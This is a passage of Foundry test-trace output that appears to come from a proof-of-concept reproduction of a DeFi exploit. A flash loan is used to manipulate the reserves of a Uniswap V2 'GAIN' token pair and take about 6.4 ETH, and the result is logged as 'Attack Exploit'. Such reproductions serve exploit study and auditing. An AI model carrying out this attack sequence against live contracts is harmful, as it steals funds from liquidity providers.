    │   │   │   │   │   │   │   @ 0x4189c923ed1ea821eeec632d39f0196c51a67e46267a4d1d62d7714dc4594608: 0x0000000000000000000000000000000000000000000000005b94219d78973373 → 0x0000000000000000000000000000000000000000000000005b94219d712729d4
    │   │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x000000000000000000000000000000000000000000000000000000000770099f
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 6598936314096593364 [6.598e18]
    │   │   │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 816880259393116842246651 [8.168e23]
    │   │   │   │   │   ├─ emit Sync(reserve0: 6598936314096593364 [6.598e18], reserve1: 816880259393116842246651 [8.168e23])
    │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 15493329391412 [1.549e13], amount0Out: 124783007 [1.247e8], amount1Out: 0, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x65d6379700000000acfb2ae76ed80deb32c70000000000005b94219d78973373 → 0x65d6379700000000acfb2ae77cef605041fb0000000000005b94219d712729d4
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] WETH::balanceOf(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 124783007 [1.247e8]
    │   │   │   │   ├─ [9223] WETH::withdraw(124783007 [1.247e8])
    │   │   │   │   │   ├─ [83] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::fallback{value: 124783007}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Withdrawal(src: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 124783007 [1.247e8])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x000000000000000000000000000000000000000000000000000000000770099f → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [55] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::fallback{value: 124783007}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [0] 0x9F3ca923C65738B3F85Dc4de1b5163E178bf2E16::fallback{value: 41594335}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [0] 0x7B6F62aF8641EC14Fc763b4F3fD5035D49C7DB91::fallback{value: 83188671}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, value: 20800000000000 [2.08e13])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], value: 109200000000000 [1.092e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0x00bf5fb8525f25244c705fba896300dde9688de2249fa84938479ad95f5b5b92 → 0x56c3784bc71b8fa3464b828b6ec3426720b4548a143d5a76469d487d581dfb92
    │   │   │   │   @ 0x9d437d096b5b57ac6e4ce772173e3061bda7a205c3cbfe952dcf5d9764d3ae91: 0x000000000d9248dc44303cd4bf9bddd766273f21e09f9bbcd9b0888ce9c047d8 → 0x04189374c9fcc7d61f530dba1fdd670eb1ede7117e51c8cb2fb49d026f8067d8
    │   │   │   │   @ 0x7eca8d69f46c70f4f9c16933c63ed8df9f5b0c1d07ac9972f81515e308ba23ef: 0xa4057d440cdf9b41545bfa208e040f4c3545bdc2f3bba9f264714eef04628c73 → 0x3d9f16dda67934daedf593ba279da8e5cedf575c8d55438bfe0b4f74f49f6c73
    │   │   │   │   @ 0xfa758cef5bd0db441ee78e87b9ceab03f7b5d7b78ff593b3cf8150611abcb999: 0x14ff56bcad7d0c63209a5fef318321526ce0a55d88f280c43079a5100608f105 → 0x178eb2e5a33f9bbf4990227e8dac1714fc3cce534b81dced263c31d979a10505
    │   │   │   │   @ 0x3e7a4ec3808ac56dee4175102d2849c9b4b15bc1b048f158b633acdf78f8b033: 0x000000000000493751b4655368cac9f7c5f3e2fa05546e423807f9590bb4992c → 0x09ba5e353f7d36c8ba2715742d666fdb19ebb1d31bdb99444451a9f0295ce52c
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   └─ ← [Return] 6598936314096593364 [6.598e18]
    │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   └─ ← [Return] 6598936314096593364 [6.598e18]
    │   │   ├─ [38671] Uniswap V2: GAIN::swap(6532946950955627431 [6.532e18], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [23162] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6532946950955627431 [6.532e18])
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 6532946950955627431 [6.532e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x4189c923ed1ea821eeec632d39f0196c51a67e46267a4d1d62d7714dc4594608: 0x0000000000000000000000000000000000000000000000005b94219d712729d4 → 0x00000000000000000000000000000000000000000000000000ea70f9e4f8b62d
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000005aa9b0a38c2e73a7
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 65989363140965933 [6.598e16]
    │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 94809745233956213877561280 [9.48e25]
    │   │   │   ├─ emit Sync(reserve0: 65989363140965933 [6.598e16], reserve1: 94809745233956213877561280 [9.48e25])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 93992864974563097035314629 [9.399e25], amount0Out: 6532946950955627431 [6.532e18], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x65d6379700000000acfb2ae77cef605041fb0000000000005b94219d712729d4 → 0x65d637970000004e6cbe9678444fa4ced7c000000000000000ea70f9e4f8b62d
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] WETH::transfer(Uniswap V3: USDT: [0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b], 100010000000000000 [1e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Uniswap V3: USDT: [0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b], value: 100010000000000000 [1e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x2a306d7595987ab10375e6e054d7489cc80c1cf5351587e21ffbd126573f06c6: 0x00000000000000000000000000000000000000000000002a05b03243a49ac305 → 0x00000000000000000000000000000000000000000000002a071380d450976305
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000005aa9b0a38c2e73a7 → 0x00000000000000000000000000000000000000000000000059466212e031d3a7
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x4189c923ed1ea821eeec632d39f0196c51a67e46267a4d1d62d7714dc4594608: 0x0000000000000000000000000000000000000000000000005a30dc251b148907 → 0x0000000000000000000000000000000000000000000000005b94219d789e8907
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0xa4c4dcfb0cfeb99ebddcb475c423fb40a8f4dad47c7df8e0a298e7a14df34449 → 0x56c3784bc71b8fa3464b828b6ec3426720b4548a143d5a76469d487d581dfb92
    │   │   └─ ← [Stop]
    │   ├─ [534] WETH::balanceOf(Uniswap V3: USDT: [0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b]) [staticcall]
    │   │   └─ ← [Return] 775273143927997686533 [7.752e20]
    │   ├─ [1031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(Uniswap V3: USDT: [0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b]) [staticcall]
    │   │   └─ ← [Return] 3033512964845 [3.033e12]
    │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 100000000000000000 [1e17], param3: 0, param4: 10000000000000 [1e13], param5: 0)
    │   ├─  storage changes:
    │   │   @ 1: 0x00000000000000000000000000000122133797e05af312835985be46ec2749d0 → 0x00000000000000000000000000000122133829cbc4ab29958bed9e7f9fea082c
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 6432936950955627431 [6.432e18]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 6432936950955627431 [6.432e18]
    ├─ [0] console::log("Attack Exploit: %s.%s ETH", 6, 432936950955627431 [4.329e17]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0: 0x000000000100010000fd000e00000000000000000003878f19f7e53c816d8ab5 → 0x000100000100010000fd000e00000000000000000003878f19f7e53c816d8ab5
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 15.14s (12.82s CPU time)

Ran 2 test suites in 15.34s (16.51s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
